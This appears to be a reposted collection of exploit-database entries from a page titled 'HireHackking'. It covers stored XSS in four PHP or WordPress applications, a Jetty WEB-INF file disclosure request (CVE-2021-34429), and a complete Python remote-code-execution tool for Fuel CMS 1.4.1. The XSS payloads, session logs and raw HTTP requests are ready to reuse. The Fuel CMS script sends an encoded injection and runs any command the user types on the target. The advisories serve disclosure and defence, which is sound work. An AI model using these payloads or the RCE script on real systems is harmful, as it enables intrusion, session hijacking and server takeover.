HireHackking

# Exploit Title: PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS) # Google Dork: subtitle:Copyright © 2021 PHPJabbers.com # Date: 2021-10-28 # Exploit Author: Vulnerability-Lab # Vendor Homepage: https://www.phpjabbers.com/faq.php # Software Link: https://www.phpjabbers.com/simple-cms/ # Version: v5 # Tested on: Linux Document Title: =============== PHPJabbers Simple CMS v5 - Persistent XSS Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2300 Release Date: ============= 2021-10-28 Vulnerability Laboratory ID (VL-ID): ==================================== 2300 Common Vulnerability Scoring System: ==================================== 5.4 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== A simple PHP content management system for easy web content editing and publishing. Our PHP Content Management System script is designed to provide you with powerful yet easy content administration tools. The smart CMS lets you create and manage multiple types of web sections and easily embed them into your website. You can upload a wide range of files and add users with different user access levels. Get the Developer License and customize the script to fit your specific needs. (Copy of the Homepage:https://www.phpjabbers.com/simple-cms/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent input validation vulnerability in the PHPJabbers Simple CMS v5.0 web-application. Affected Product(s): ==================== PHPJabbers Product: PHPJabbers Simple CMS v5.0 - (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-09-01: Researcher Notification & Coordination (Security Researcher) 2021-09-02: Vendor Notification (Security Department) 2021-**-**: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2021-10-28: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Moderator Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the in the PHPJabbers Simple CMS v5.0 web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent vulnerability is located in the create (pjActionCreate) and update (pjActionUpdate) post method request. Privileged authenticated accounts with ui access are able to inject own malicious script code as name for users. The script code execution is performed after the inject via post method in the user list (pjAdminUsers). Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Create (Add) [+] Update Vulnerable Parameter(s): [+] pjActionCreate [+] pjActionUpdate Affected Module(s): [+] pjAdminUsers Proof of Concept (PoC): ======================= The persistent web vulnerability can be exploited by remote attackers with privilged user accounts with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Payloads "><img src=evil.source onload=alert(document.cookie)> "><img src=evil.source onload=alert(document.domain)> --- PoC Session Logs (POST) [Add & Update] https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate Host: phpjabbers-cms.localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Content-Length: 178 Origin:https://phpjabbers-cms.localhost:8080 Connection: keep-alive Referer:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247; _gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5; pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1 user_create=1&role_id=2&email=test@ftp.world&password=test2&name=r"><img src=evil.source onload=alert(document.cookie)>&section_allow=1&file_allow=1&status=T - POST: HTTP/1.1 303 Server: Apache/2.2.15 (CentOS) Location: /1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU03 Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 -- https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate Host: phpjabbers-cms.localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Content-Length: 180 Origin:https://phpjabbers-cms.localhost:8080 Connection: keep-alive Referer:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate&id=2 Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247; _gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5; pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1 user_update=1&id=2&role_id=2&email=test@test.de&password=test&name=r"><img src=evil.source onload=alert(document.cookie)>&section_allow=1&file_allow=1&status=T - POST: HTTP/1.1 303 Server: Apache/2.2.15 (CentOS) Location:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU01 Keep-Alive: timeout=10, max=83 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 - https://phpjabbers-cms.localhost:8080/1630949262_438/evil.source Host: phpjabbers-cms.localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Referer:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU03 Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247; _gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5; pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1 - GET: HTTP/1.1 200 OK Server: Apache/2.2.15 (CentOS) Content-Length: 380 Keep-Alive: timeout=10, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Vulnerable Source: index.php?controller=pjAdminUsers (&action=pjActionIndex&err=AU03) <select data-name="status" style="display: none;" class="pj-form-field pj-form-select pj-selector-editable"><option value="T">Active</option> <option value="F">Inactive</option></select></td><td><a href="index.php?controller=pjAdminUsers&action=pjActionUpdate&id=1" class="pj-table-icon-edit"></a></td></tr><tr class="pj-table-row-even" data-id="id_3"><td><input type="checkbox" name="record[]" value="3" class="pj-table-select-row"></td><td class="pj-table-cell-editable"> <span class="pj-table-cell-label">r"><img src="evil.source" onload="alert(document.cookie)"></img></span> <input type="text" data-name="name" style="display: none;" class="pj-form-field pj-form-text pj-selector-editable" value="r"><img src=evil.source onload=alert(document.cookie)>"></td><td class="pj-table-cell-editable"> <span class="pj-table-cell-label">test@ftp.world</span><input type="text" data-name="email" style="display: none;" class="pj-form-field pj-form-text pj-selector-editable" value="test@ftp.world"></td><td><span class="pj-table-cell-label">06-09-2021</span></td> <td><span class="pj-table-cell-label"><span class="label-status user-role-editor">editor</span></span></td><td class="pj-table-cell-editable"> <span class="pj-table-cell-label pj-status pj-status-T">Active</span><select data-name="status" style="display: none;" class="pj-form-field pj-form-select pj-selector-editable"><option value="T">Active</option><option value="F">Inactive</option></select></td> <td><a href="index.php?controller=pjAdminUsers&action=pjActionUpdate&id=3" class="pj-table-icon-edit"></a> <a href="index.php?controller=pjAdminUsers&action=pjActionDeleteUser&id=3" class="pj-table-icon-delete"></a></td></tr></tbody></table> Reference(s): https://phpjabbers-cms.localhost:8080/ https://phpjabbers-cms.localhost:8080/1630949262_438/ https://phpjabbers-cms.localhost:8080/1630949262_438/index.php https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

# Exploit Title: WordPress Plugin Hotel Listing 3 - 'Multiple' Cross-Site Scripting (XSS) # Date: 2021-10-28 # Exploit Author: Vulnerability Lab # Vendor Homepage: https://hotel.eplug-ins.com/ # Software Link: https://hotel.eplug-ins.com/hoteldoc/ # Version: v3 # Tested on: Linux Document Title: =============== Hotel Listing (WP Plugin) v3.x - MyAccount XSS Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2277 Release Date: ============= 2021-10-28 Vulnerability Laboratory ID (VL-ID): ==================================== 2277 Common Vulnerability Scoring System: ==================================== 5.3 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Hotel, Motel , Bar & Restaurant Listing Plugin + Membership plugin using Wordpress with PHP and MySQL Technologie. (Copy of the Homepage:https://hotel.eplug-ins.com/hoteldoc/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the official Hotel Listing v3.x wordpress plugin web-application. Affected Product(s): ==================== e-plugins Product: Hotel Listing v3.x - Plugin Wordpress (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-08-19: Researcher Notification & Coordination (Security Researcher) 2021-08-20: Vendor Notification (Security Department) 2021-**-**: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2021-10-28: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ Multiple persistent input validation web vulnerabilities has been discovered in the official Hotel Listing v3.x wordpress plugin web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The vulnerabilities are located in add new listing - address, city, zipcode, country and location input fields of the my-account module. Remote attackers can register a low privileged application user account to inject own malicious script codes with persistent attack vector to hijack user/admin session credentials or to permanently manipulate affected modules. The execute of the malicious injected script code takes place in the frontend on preview but as well in the backend on interaction to edit or list (?&profile=all-post) by administrative accounts. The request method to inject is post and the attack vector is persistent located on the application-side. Request Method(s): [+] POST Vulnerable Module(s): [+] Add New Listing Vulnerable Input(s): [+] address [+] city [+] zipcode [+] country Affected Module(s): [+] Frontend on Preview (All Listings) [+] Backend on Preview (All Listings) or Edit Proof of Concept (PoC): ======================= The persistent web vulnerabilities can be exploited by remote attackers with privilged user accounts with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Exploitation: Payload %22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E Vulnerable Source: new-listing <div class=" form-group row"> <div class="col-md-6 "> <label for="text" class=" control-label col-md-4 ">Address</label> <input type="text" class="form-control col-md-8 " name="address" id="address" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>" placeholder="Enter address Here"> </div> <div class=" col-md-6"> <label for="text" class=" control-label col-md-4">Area</label> <input type="text" class="form-control col-md-8" name="area" id="area" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>" placeholder="Enter Area Here"> </div> </div> <div class=" form-group row"> <div class="col-md-6 "> <label for="text" class=" control-label col-md-4">City</label> <input type="text" class="form-control col-md-8" name="city" id="city" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>" placeholder="Enter city "> </div> <div class=" col-md-6"> <label for="text" class=" control-label col-md-4">Zipcode</label> <input type="text" class="form-control col-md-8" name="postcode" id="postcode" value="<[MALICIOUS SCRIPT CODE PAYLOAD!]>">>"" placeholder="Enter Zipcode "> </div> </div> <div class=" form-group row"> <div class=" col-md-6"> <label for="text" class=" control-label col-md-4">State</label> <input type="text" class="form-control col-md-8" name="state" id="state" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>" placeholder="Enter State "> </div> <div class=" col-md-6"> <label for="text" class=" control-label col-md-4">Country</label> <input type="text" class="form-control col-md-8" name="country" id="country" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>" placeholder="Enter Country "> </div> --- PoC Session Logs (POST) --- http://hotel-eplug-ins.localhost:8000/wp-admin/admin-ajax.php Host: hotel-eplug-ins.localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1603 Origin:http://hotel-eplug-ins.localhost:8000 Connection: keep-alive Referer:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=new-listing - action=iv_directories_save_listing&form_data=cpt_page=hotel&title=test1&new_post_content=test2&logo_image_id=&feature_image_id= &gallery_image_ids=&post_status=pending&postcats%5B%5D=&address=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&area=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E& city=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&postcode=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E& state=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&country=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E& latitude=&longitude=&new_tag=&phone=&fax=&contact-email=&contact_web=&award_title%5B%5D=&award_description%5B%5D=& award_year%5B%5D=&menu_title%5B%5D=&menu_description%5B%5D=&menu_price%5B%5D=&menu_order%5B%5D=&room_title%5B%5D=&room_description%5B%5D=&room_price%5B%5D=& room_order%5B%5D=&override_bookingf=no&booking_stcode=&youtube=&vimeo=&facebook=&linkedin=&twitter=&gplus=&pinterest=&instagram=&Rooms=&suites=& Rating_stars=&CHECK_IN=&CHECK_out=&Cancellation=&Pets=&Children_and_Extra_Beds=&day_name%5B%5D=Monday+&day_value1%5B%5D=& day_value2%5B%5D=&event-title=&event-detail=++&event_image_id=&user_post_id=&_wpnonce=50241bc992 - POST: HTTP/1.1 200 OK Server: nginx/1.18.0 Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Origin:http://hotel-eplug-ins.localhost:8000 Access-Control-Allow-Credentials: true Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin Content-Encoding: gzip - http://hotel-eplug-ins.localhost:8000/my-account-2/?&profile=all-post Host: hotel-eplug-ins.localhost:8000 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Referer:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=new-listing - GET: HTTP/1.1 200 OK Server: nginx/1.18.0 Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=all-post Solution - Fix & Patch: ======================= 1. Encode and parse all vulnerable input fields on transmit via post method request 2. Restrict the input fields to disallow usage of special chars 3. Encode and escape the output content in the edit and list itself to prevent the execution point Security Risk: ============== The security risk of the persistent cross site scripting web vulnerability in the hotel listing application is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

# Exploit Title: WordPress Plugin Popup Anything 2.0.3 - 'Multiple' Stored Cross-Site Scripting (XSS) # Date: 03/11/2021 # Exploit Author: Luca Schembri # Vendor Homepage: https://www.essentialplugin.com/ # Software Link: https://wordpress.org/plugins/popup-anything-on-click/ # Version: < 2.0.4 ** Summary ** A user with a low privileged user can perform XSS-Stored attacks. ** Plugin description ** Popup Anything is the best popup builder and marketing plugin that helps you get more email subscribers, increase sales and grow your business. Manage powerful modal popup for your WordPress blog or website. You can add an unlimited popup with your configurations. ** Vulnerable page ** http://{WEBSITE}/wp-admin/post.php?post={ID}&action=edit ** PoC ** Go on the "Popup Anything - Settings" tab and select "Simple Link" as "Link Type". Select "Link Test" and use this payload: test" onclick="alert(1) Save the popup and reload the page. Now click on "Link Text" and it will execute the javascript code The same attack can be exploited with "Button Text" and "Popup width" fields. ** Remediation ** Upgrade to 2.0.4 version or later

# Exploit Title: Eclipse Jetty 11.0.5 - Sensitive File Disclosure # Date: 2021-11-03 # Exploit Author: Mayank Deshmukh # Vendor Homepage: https://www.eclipse.org/jetty/ # Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/ # Version: 9.4.37 ≤ version < 9.4.43, 10.0.1 ≤ version < 10.0.6, 11.0.1 ≤ version < 11.0.6 # Security Advisory: https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm # Tested on: Kali Linux # CVE : CVE-2021-34429 # Github POC: https://github.com/ColdFusionX/CVE-2021-34429 POC - Access WEB-INF/web.xml ## Request GET /%u002e/WEB-INF/web.xml HTTP/1.1 Host: localhost:9006 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 ## Response HTTP/1.1 200 OK Connection: close Last-Modified: Wed, 03 Nov 2021 08:25:24 GMT Content-Type: application/xml Accept-Ranges: bytes Content-Length: 209 Server: Jetty(11.0.5) <!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" "http://java.sun.com/dtd/web-app_2_3.dtd" > <web-app> <display-name>ColdFusionX - Web Application</display-name> </web-app>

# Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution (3) # Exploit Author: Padsala Trushal # Date: 2021-11-03 # Vendor Homepage: https://www.getfuelcms.com/ # Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 # Version: <= 1.4.1 # Tested on: Ubuntu - Apache2 - php5 # CVE : CVE-2018-16763 #!/usr/bin/python3 import requests from urllib.parse import quote import argparse import sys from colorama import Fore, Style def get_arguments(): parser = argparse.ArgumentParser(description='fuel cms fuel CMS 1.4.1 - Remote Code Execution Exploit',usage=f'python3 {sys.argv[0]} -u <url>',epilog=f'EXAMPLE - python3 {sys.argv[0]} -u http://10.10.21.74') parser.add_argument('-v','--version',action='version',version='1.2',help='show the version of exploit') parser.add_argument('-u','--url',metavar='url',dest='url',help='Enter the url') args = parser.parse_args() if len(sys.argv) <=2: parser.print_usage() sys.exit() return args args = get_arguments() url = args.url if "http" not in url: sys.stderr.write("Enter vaild url") sys.exit() try: r = requests.get(url) if r.status_code == 200: print(Style.BRIGHT+Fore.GREEN+"[+]Connecting..."+Style.RESET_ALL) except requests.ConnectionError: print(Style.BRIGHT+Fore.RED+"Can't connect to url"+Style.RESET_ALL) sys.exit() while True: cmd = input(Style.BRIGHT+Fore.YELLOW+"Enter Command $"+Style.RESET_ALL) main_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quote(cmd)+"%27%29%2b%27" r = requests.get(main_url) #<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"> output = r.text.split('<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">') print(output[0]) if cmd == "exit": break

# Exploit Title: Simplephpscripts Simple CMS 2.1 - 'Multiple' Stored Cross-Site Scripting (XSS) # Date: 2021-10-19 # Exploit Author: Vulnerability Lab # Vendor Homepage: https://simplephpscripts.com/simple-cms-php # Version: 2.1 # Tested on: Linux Document Title: =============== Simplephpscripts Simple CMS v2.1 - Persistent Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2302 Release Date: ============= 2021-10-19 Vulnerability Laboratory ID (VL-ID): ==================================== 2302 Common Vulnerability Scoring System: ==================================== 5.3 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== The system could be used only in already existing websites to control their page sections and contents. Just paste a single line of code on your web page section and start controlling it through the admin area. Very simple installation - one step installation wizard. Option to include contents into web page sections through php include, javascript or iframe embed. Any language support. WYSIWYG(text) editor to styling and format contents of the sections. Suitable for web designers who work with Mobirise, Xara and other web builders. (Copy of the Homepage: https://simplephpscripts.com/simple-cms-php ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the Simplephpscripts Simple CMS v2.1 web-application. Affected Product(s): ==================== Simplephpscripts Product: Simple CMS v2.1 - Content Management System (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-09-03: Researcher Notification & Coordination (Security Researcher) 2021-09-04: Vendor Notification (Security Department) 2021-**-**: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2021-10-19: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Full Authentication (Admin/Root Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the Simplephpscripts Simple CMS v2.1 web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent cross site web vulnerability is located in `name`, `username`, `password` parameters of the `newUser` or `editUser` modules. Remote attackers with privileged application user account and panel access are able to inject own malicious script code as credentials. The injected code executes on preview of the users list. The request method to inject is post and the attack vector is persistent. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] newUser [+] editUser Vulnerable File(s): [+] admin.php?act=users Vulnerable Input(s): [+] Name [+] Username [+] Password Vulnerable Parameter(s): [+] name [+] username [+] password Affected Module(s): [+] Users (act=users) (Backend) Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by remote attackers with privileged account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. PoC: Payload "><img src='31337'onerror=alert(0)></img> Vulnerable Source: admin.php?act=users <tbody><tr> <td class="headlist"><a href="admin.php?act=users&orderType=DESC&orderBy=name">Name</a></td> <td class="headlist" width="23%"><a href="admin.php?act=users&orderType=DESC&orderBy=email">Email</a></td> <td class="headlist" width="23%"><a href="admin.php?act=users&orderType=DESC&orderBy=username">Username</a></td> <td class="headlist" width="23%">Password</td> <td class="headlist" colspan="2">&nbsp;</td> </tr> <tr> <td class="bodylist">c"><img src='31337'onerror=alert(0)></img></td> <td class="bodylist">keymaster23@protonmail.com</td> <td class="bodylist">d"><img src='31337'onerror=alert(0)></img></td> <td class="bodylist">e"><img src='31337'onerror=alert(0)></img></td> <td class="bodylistAct"><a href="admin.php?act=editUser&id=7" title="Edit"><img class="act" src="images/edit.png" alt="Edit"></a></td> <td class="bodylistAct"><a class="delete" href="admin.php?act=delUser&id=7" onclick="return confirm('Are you sure you want to delete it?');" title="DELETE"><img class="act" src="images/delete.png" alt="DELETE"></a></td> </tr> --- PoC Session Logs (POST) [Create] --- https://simple-cms.localhost:8000/simplecms/admin.php Host: simple-cms.localhost:8000 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Content-Length: 141 Origin: https://simple-cms.localhost:8000 Connection: keep-alive Referer: https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23 act=addUser&name=c"><img src='31337'onerror=alert(0)></img>&email=tester23@test.de &username=d"><img src='31337'onerror=alert(0)></img> &password=e"><img src='31337'onerror=alert(0)></img>&submit=Add User - POST: HTTP/2.0 200 OK server: Apache content-length: 5258 content-type: text/html; charset=UTF-8 - https://simple-cms.localhost:8000/simplecms/31337 Host: simple-cms.localhost:8000 Accept: image/webp,*/* Connection: keep-alive Referer: https://simple-cms.localhost:8000/simplecms/admin.php Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23 - GET: HTTP/2.0 200 OK server: Apache content-length: 196 content-type: text/html; charset=iso-8859-1 Reference(s): https://simple-cms.localhost:8000/simplecms/admin.php https://simple-cms.localhost:8000/simplecms/admin.php https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser Credits & Authors: ================== Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE LUDWIG-ERHARD STRAßE 4 34131 KASSEL - HESSEN DEUTSCHLAND (DE)

